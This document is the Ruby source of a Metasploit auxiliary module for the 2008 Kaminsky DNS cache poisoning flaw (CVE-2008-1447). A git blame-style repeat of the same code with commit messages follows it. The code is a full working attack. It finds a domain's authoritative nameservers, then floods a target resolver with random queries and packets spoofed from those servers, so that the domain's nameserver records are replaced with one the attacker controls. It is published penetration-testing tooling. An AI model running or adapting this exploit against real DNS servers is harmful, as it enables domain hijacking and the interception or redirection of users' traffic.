metasploit-framework/modules/auxiliary/spoof/dns/bailiwicked_domain.rb

require 'msf/core'
require 'net/dns'
require 'scruby'
require 'resolv'

module Msf

class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary

	include Exploit::Remote::Ip

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'DNS BailiWicked Domain Attack',
			'Description'    => %q{
				This exploit attacks a fairly ubiquitous flaw in DNS implementations which 
				Dan Kaminsky found and disclosed ~Jul 2008.  This exploit replaces the target
				domains nameserver entries in a vulnerable DNS cache server. This attack works
				by sending random hostname queries to the target DNS server coupled with spoofed
				replies to those queries from the authoritative nameservers for that domain.
				Eventually, a guessed ID will match, the spoofed packet will get accepted, and
				the nameserver entries for the target domain will be replaced by the server
				specified in the NEWDNS option of this exploit. 
			},
			'Author'         => 
				[ 
				'	I)ruid', 'hdm',
					                                      #
					'Cedric Blancher <sid[at]rstack.org>' # Cedric figured out the NS injection method 
					                                      # and was cool enough to email us and share!
					                                      #
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2008-1447' ],
					[ 'US-CERT-VU', '8000113' ],
					[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ],
				],
			'DisclosureDate' => 'Jul 21 2008'
			))
			
			register_options(
				[
					OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
					OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),
					OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),
					OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),
					OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),
					OptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]),
				], self.class)
					
	end
	
	def auxiliary_commands
		return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }
	end

	def cmd_check(*args)
		targ = args[0] || rhost()
		if(not (targ and targ.length > 0))
			print_status("usage: check [dns-server]")
			return
		end

		print_status("Using the Metasploit service to verify exploitability...")
		srv_sock = Rex::Socket.create_udp(
			'PeerHost' => targ,
			'PeerPort' => 53
		)		

		random = false
		ports  = []
		lport  = nil
		
		1.upto(5) do |i|
		
			req = Resolv::DNS::Message.new
			txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"
			req.add_question(txt, Resolv::DNS::Resource::IN::TXT)
			req.rd = 1
			
			srv_sock.put(req.encode)
			res, addr = srv_sock.recvfrom()
			

			if res and res.length > 0
				res = Resolv::DNS::Message.decode(res)
				res.each_answer do |name, ttl, data|
					if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m)
						t_addr, t_port = $1.split(':')

						print_status(" >> ADDRESS: #{t_addr}  PORT: #{t_port}")
						t_port = t_port.to_i
						if(lport and lport != t_port)
							random = true
						end
						lport  = t_port
						ports << t_port
					end
				end
			end	
		end
		
		srv_sock.close
		
		if(ports.length < 5)
			print_status("UNKNOWN: This server did not reply to our vulnerability check requests")
			return
		end
		
		if(random)
			print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}")
			print_status("      This server may still be exploitable, but not by this tool.")
		else
			print_status("FAIL: This server uses static source ports and is vulnerable to poisoning")
		end
	end
		
	def run
		target  = rhost()
		source  = Rex::Socket.source_address(target)
		sport   = datastore['SRCPORT']
		domain  = datastore['DOMAIN'] + '.'
		newdns  = datastore['NEWDNS']
		recons  = datastore['RECONS']
		xids    = datastore['XIDS'].to_i
		newttl  = datastore['TTL'].to_i
		xidbase = rand(20001) + 20000
		
		address = Rex::Text.rand_text(4).unpack("C4").join(".")

		srv_sock = Rex::Socket.create_udp(
			'PeerHost' => target,
			'PeerPort' => 53
		)

		# Get the source port via the metasploit service if it's not set
		if sport.to_i == 0
			req = Resolv::DNS::Message.new
			txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"
			req.add_question(txt, Resolv::DNS::Resource::IN::TXT)
			req.rd = 1
			
			srv_sock.put(req.encode)
			res, addr = srv_sock.recvfrom()
			
			if res and res.length > 0
				res = Resolv::DNS::Message.decode(res)
				res.each_answer do |name, ttl, data|
					if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m)
						t_addr, t_port = $1.split(':')
						sport = t_port.to_i

						print_status("Switching to target port #{sport} based on Metasploit service")
						if target != t_addr
							print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!")
						end
					end
				end
			end
		end

		# Verify its not already poisoned
		begin
			query = Resolv::DNS::Message.new
			query.add_question(domain, Resolv::DNS::Resource::IN::NS)
			query.rd = 0

			begin
				cached = false
				srv_sock.put(query.encode)
				answer, addr = srv_sock.recvfrom()

				if answer and answer.length > 0
					answer = Resolv::DNS::Message.decode(answer)
					answer.each_answer do |name, ttl, data|

						if((name.to_s + ".") == domain and data.name.to_s == newdns)
							t = Time.now + ttl
							print_status("Failure: This domain is already using #{newdns} as a nameserver")
							print_status("         Cache entry expires on #{t.to_s}")
							srv_sock.close
							disconnect_ip
							return
						end
					end
					
				end
			end until not cached
		rescue ::Interrupt
			raise $!
		rescue ::Exception => e
			print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")
		end


		res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver

		print_status "Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}"

		# Look up the nameservers for the domain
		print_status "Querying recon nameserver for #{domain}'s nameservers..."
		answer0 = res0.send(domain, Net::DNS::NS)
		#print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"

		barbs = [] # storage for nameservers
		answer0.answer.each do |rr0|
			print_status " Got an #{rr0.type} record: #{rr0.inspect}"
			if rr0.type == 'NS'
				print_status "  Querying recon nameserver for address of #{rr0.nsdname}..."
				answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname
				#print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities"
				answer1.answer.each do |rr1|
					print_status "   Got an #{rr1.type} record: #{rr1.inspect}"
					res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) 
					print_status "    Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."
					answer2 = res2.send(domain)
					if answer2 and answer2.header.auth? and answer2.header.anCount >= 1
						nsrec = {:name => rr0.nsdname, :addr => rr1.address}
						barbs << nsrec
						print_status "    #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as"
					end
				end
			end	
		end

		if barbs.length == 0
			print_status( "No DNS servers found.")
			srv_sock.close
			disconnect_ip
			return
		end

		# Flood the target with queries and spoofed responses, one will eventually hit
		queries = 0
		responses = 0

		connect_ip if not ip_sock

		print_status( "Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...")

		while true
			randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname

			# Send spoofed query
			req = Resolv::DNS::Message.new
			req.id = rand(2**16)
			req.add_question(randhost, Resolv::DNS::Resource::IN::A)

			req.rd = 1

			buff = (
				Scruby::IP.new(
					#:src   => barbs[0][:addr].to_s,
					:src   => source,
					:dst   => target,
					:proto => 17
				)/Scruby::UDP.new(
					:sport => (rand((2**16)-1024)+1024).to_i,
					:dport => 53
				)/req.encode
			).to_net
			ip_sock.sendto(buff, target)
			queries += 1
			
			# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])
			req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address))
			req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns)))
			req.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored
			req.qr = 1
			req.aa = 1

			xidbase.upto(xidbase+xids-1) do |id|
				req.id = id
				barbs.each do |barb|
					buff = (
						Scruby::IP.new(
							#:src   => barbs[i][:addr].to_s,
							:src   => barb[:addr].to_s,
							:dst   => target,
							:proto => 17
						)/Scruby::UDP.new(
							:sport => 53,
							:dport => sport.to_i
						)/req.encode
					).to_net
					ip_sock.sendto(buff, target)
					responses += 1
				end
			end

			# status update
			if queries % 1000 == 0
				print_status("Sent #{queries} queries and #{responses} spoofed responses...")
			end

			# every so often, check and see if the target is poisoned...
			if queries % 250 == 0 
				begin
					query = Resolv::DNS::Message.new
					query.add_question(domain, Resolv::DNS::Resource::IN::NS)
					query.rd = 0
	
					srv_sock.put(query.encode)
					answer, addr = srv_sock.recvfrom()

					if answer and answer.length > 0
						answer = Resolv::DNS::Message.decode(answer)
						answer.each_answer do |name, ttl, data|
							if((name.to_s + ".") == domain and data.name.to_s == newdns)
								print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}")
								srv_sock.close
								disconnect_ip
								return
							end
						end
					end
				rescue ::Interrupt
					raise $!
				rescue ::Exception => e
					print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}")
				end
			end

		end

	end

end
end
Adds the domain version of this exploit, which replaces the cached nameservers with the one we specify. git-svn-id: file:///home/svn/framework3/trunk@5587 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-24 02:40:48 +00:00			`require 'msf/core'`
			`require 'net/dns'`
			`require 'scruby'`
			`require 'resolv'`

			`module Msf`

			`class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary`

			`include Exploit::Remote::Ip`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'DNS BailiWicked Domain Attack',`
			`'Description' => %q{`
			`This exploit attacks a fairly ubiquitous flaw in DNS implementations which`
Tweak the XIDs again (this seems better), correct the module descriptions git-svn-id: file:///home/svn/framework3/trunk@5590 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-24 03:53:35 +00:00			`Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target`
			`domains nameserver entries in a vulnerable DNS cache server. This attack works`
			`by sending random hostname queries to the target DNS server coupled with spoofed`
			`replies to those queries from the authoritative nameservers for that domain.`
			`Eventually, a guessed ID will match, the spoofed packet will get accepted, and`
			`the nameserver entries for the target domain will be replaced by the server`
Test commit to verify my new account. git-svn-id: file:///home/svn/framework3/trunk@5592 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-24 20:21:47 +00:00			`specified in the NEWDNS option of this exploit.`
Adds the domain version of this exploit, which replaces the cached nameservers with the one we specify. git-svn-id: file:///home/svn/framework3/trunk@5587 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-24 02:40:48 +00:00			`},`
Credit Cedric for his help in implementing the NS injection/domain module. Thanks again! git-svn-id: file:///home/svn/framework3/trunk@5591 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-24 04:29:14 +00:00			`'Author' =>`
			`[`
			`' I)ruid', 'hdm',`
			`#`
			`'Cedric Blancher <sid[at]rstack.org>' # Cedric figured out the NS injection method`
			`# and was cool enough to email us and share!`
			`#`
			`],`
Adds the domain version of this exploit, which replaces the cached nameservers with the one we specify. git-svn-id: file:///home/svn/framework3/trunk@5587 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-24 02:40:48 +00:00			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`[ 'CVE', '2008-1447' ],`
			`[ 'US-CERT-VU', '8000113' ],`
			`[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ],`
			`],`
			`'DisclosureDate' => 'Jul 21 2008'`
			`))`

			`register_options(`
			`[`
			`OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),`
Be nice to Dan's server :P git-svn-id: file:///home/svn/framework3/trunk@5589 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-24 03:15:59 +00:00			`OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),`
Adds the domain version of this exploit, which replaces the cached nameservers with the one we specify. git-svn-id: file:///home/svn/framework3/trunk@5587 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-24 02:40:48 +00:00			`OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),`
			`OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),`
			`OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),`
			`OptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]),`
			`], self.class)`

			`end`

			`def auxiliary_commands`
			`return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }`
			`end`

			`def cmd_check(*args)`
			`targ = args[0] \|\| rhost()`
			`if(not (targ and targ.length > 0))`
			`print_status("usage: check [dns-server]")`
			`return`
			`end`

			`print_status("Using the Metasploit service to verify exploitability...")`
			`srv_sock = Rex::Socket.create_udp(`
			`'PeerHost' => targ,`
			`'PeerPort' => 53`
			`)`

			`random = false`
			`ports = []`
			`lport = nil`

			`1.upto(5) do \|i\|`

			`req = Resolv::DNS::Message.new`
			`txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"`
			`req.add_question(txt, Resolv::DNS::Resource::IN::TXT)`
			`req.rd = 1`

			`srv_sock.put(req.encode)`
			`res, addr = srv_sock.recvfrom()`


			`if res and res.length > 0`
			`res = Resolv::DNS::Message.decode(res)`
			`res.each_answer do \|name, ttl, data\|`
			`if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m)`
			`t_addr, t_port = $1.split(':')`

			`print_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}")`
			`t_port = t_port.to_i`
			`if(lport and lport != t_port)`
			`random = true`
			`end`
			`lport = t_port`
			`ports << t_port`
			`end`
			`end`
			`end`
			`end`

			`srv_sock.close`

			`if(ports.length < 5)`
			`print_status("UNKNOWN: This server did not reply to our vulnerability check requests")`
			`return`
			`end`

			`if(random)`
			`print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}")`
			`print_status(" This server may still be exploitable, but not by this tool.")`
			`else`
			`print_status("FAIL: This server uses static source ports and is vulnerable to poisoning")`
			`end`
			`end`

			`def run`
			`target = rhost()`
			`source = Rex::Socket.source_address(target)`
			`sport = datastore['SRCPORT']`
			`domain = datastore['DOMAIN'] + '.'`
			`newdns = datastore['NEWDNS']`
			`recons = datastore['RECONS']`
			`xids = datastore['XIDS'].to_i`
			`newttl = datastore['TTL'].to_i`
Tweak the XIDs again (this seems better), correct the module descriptions git-svn-id: file:///home/svn/framework3/trunk@5590 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-24 03:53:35 +00:00			`xidbase = rand(20001) + 20000`
Adds the domain version of this exploit, which replaces the cached nameservers with the one we specify. git-svn-id: file:///home/svn/framework3/trunk@5587 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-24 02:40:48 +00:00
			`address = Rex::Text.rand_text(4).unpack("C4").join(".")`

			`srv_sock = Rex::Socket.create_udp(`
			`'PeerHost' => target,`
			`'PeerPort' => 53`
			`)`

			`# Get the source port via the metasploit service if it's not set`
			`if sport.to_i == 0`
			`req = Resolv::DNS::Message.new`
			`txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"`
			`req.add_question(txt, Resolv::DNS::Resource::IN::TXT)`
			`req.rd = 1`

			`srv_sock.put(req.encode)`
			`res, addr = srv_sock.recvfrom()`

			`if res and res.length > 0`
			`res = Resolv::DNS::Message.decode(res)`
			`res.each_answer do \|name, ttl, data\|`
			`if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m)`
			`t_addr, t_port = $1.split(':')`
			`sport = t_port.to_i`

			`print_status("Switching to target port #{sport} based on Metasploit service")`
			`if target != t_addr`
			`print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!")`
			`end`
			`end`
			`end`
			`end`
			`end`

			`# Verify its not already poisoned`
			`begin`
			`query = Resolv::DNS::Message.new`
			`query.add_question(domain, Resolv::DNS::Resource::IN::NS)`
			`query.rd = 0`

			`begin`
			`cached = false`
			`srv_sock.put(query.encode)`
			`answer, addr = srv_sock.recvfrom()`

			`if answer and answer.length > 0`
			`answer = Resolv::DNS::Message.decode(answer)`
			`answer.each_answer do \|name, ttl, data\|`

			`if((name.to_s + ".") == domain and data.name.to_s == newdns)`
			`t = Time.now + ttl`
			`print_status("Failure: This domain is already using #{newdns} as a nameserver")`
			`print_status(" Cache entry expires on #{t.to_s}")`
			`srv_sock.close`
			`disconnect_ip`
			`return`
			`end`
			`end`

			`end`
			`end until not cached`
			`rescue ::Interrupt`
			`raise $!`
			`rescue ::Exception => e`
			`print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")`
			`end`


			`res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver`

			`print_status "Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}"`

			`# Look up the nameservers for the domain`
			`print_status "Querying recon nameserver for #{domain}'s nameservers..."`
			`answer0 = res0.send(domain, Net::DNS::NS)`
			`#print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"`

			`barbs = [] # storage for nameservers`
			`answer0.answer.each do \|rr0\|`
			`print_status " Got an #{rr0.type} record: #{rr0.inspect}"`
			`if rr0.type == 'NS'`
			`print_status " Querying recon nameserver for address of #{rr0.nsdname}..."`
			`answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname`
			`#print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities"`
			`answer1.answer.each do \|rr1\|`
			`print_status " Got an #{rr1.type} record: #{rr1.inspect}"`
			`res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1)`
			`print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."`
			`answer2 = res2.send(domain)`
			`if answer2 and answer2.header.auth? and answer2.header.anCount >= 1`
			`nsrec = {:name => rr0.nsdname, :addr => rr1.address}`
			`barbs << nsrec`
			`print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as"`
			`end`
			`end`
			`end`
			`end`

			`if barbs.length == 0`
			`print_status( "No DNS servers found.")`
			`srv_sock.close`
			`disconnect_ip`
			`return`
			`end`

			`# Flood the target with queries and spoofed responses, one will eventually hit`
			`queries = 0`
			`responses = 0`

			`connect_ip if not ip_sock`

			`print_status( "Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...")`

			`while true`
			`randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname`

			`# Send spoofed query`
			`req = Resolv::DNS::Message.new`
			`req.id = rand(2**16)`
			`req.add_question(randhost, Resolv::DNS::Resource::IN::A)`

			`req.rd = 1`

			`buff = (`
			`Scruby::IP.new(`
			`#:src => barbs[0][:addr].to_s,`
			`:src => source,`
			`:dst => target,`
			`:proto => 17`
			`)/Scruby::UDP.new(`
			`:sport => (rand((2**16)-1024)+1024).to_i,`
			`:dport => 53`
			`)/req.encode`
			`).to_net`
			`ip_sock.sendto(buff, target)`
			`queries += 1`

			`# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])`
			`req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address))`
			`req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns)))`
			`req.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored`
			`req.qr = 1`
			`req.aa = 1`

			`xidbase.upto(xidbase+xids-1) do \|id\|`
			`req.id = id`
			`barbs.each do \|barb\|`
			`buff = (`
			`Scruby::IP.new(`
			`#:src => barbs[i][:addr].to_s,`
			`:src => barb[:addr].to_s,`
			`:dst => target,`
			`:proto => 17`
			`)/Scruby::UDP.new(`
			`:sport => 53,`
			`:dport => sport.to_i`
			`)/req.encode`
			`).to_net`
			`ip_sock.sendto(buff, target)`
			`responses += 1`
			`end`
			`end`

			`# status update`
			`if queries % 1000 == 0`
			`print_status("Sent #{queries} queries and #{responses} spoofed responses...")`
			`end`

			`# every so often, check and see if the target is poisoned...`
			`if queries % 250 == 0`
			`begin`
			`query = Resolv::DNS::Message.new`
			`query.add_question(domain, Resolv::DNS::Resource::IN::NS)`
			`query.rd = 0`

			`srv_sock.put(query.encode)`
			`answer, addr = srv_sock.recvfrom()`

			`if answer and answer.length > 0`
			`answer = Resolv::DNS::Message.decode(answer)`
			`answer.each_answer do \|name, ttl, data\|`
			`if((name.to_s + ".") == domain and data.name.to_s == newdns)`
			`print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}")`
			`srv_sock.close`
			`disconnect_ip`
			`return`
			`end`
			`end`
			`end`
			`rescue ::Interrupt`
			`raise $!`
			`rescue ::Exception => e`
			`print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}")`
			`end`
			`end`

			`end`

			`end`

			`end`
			`end`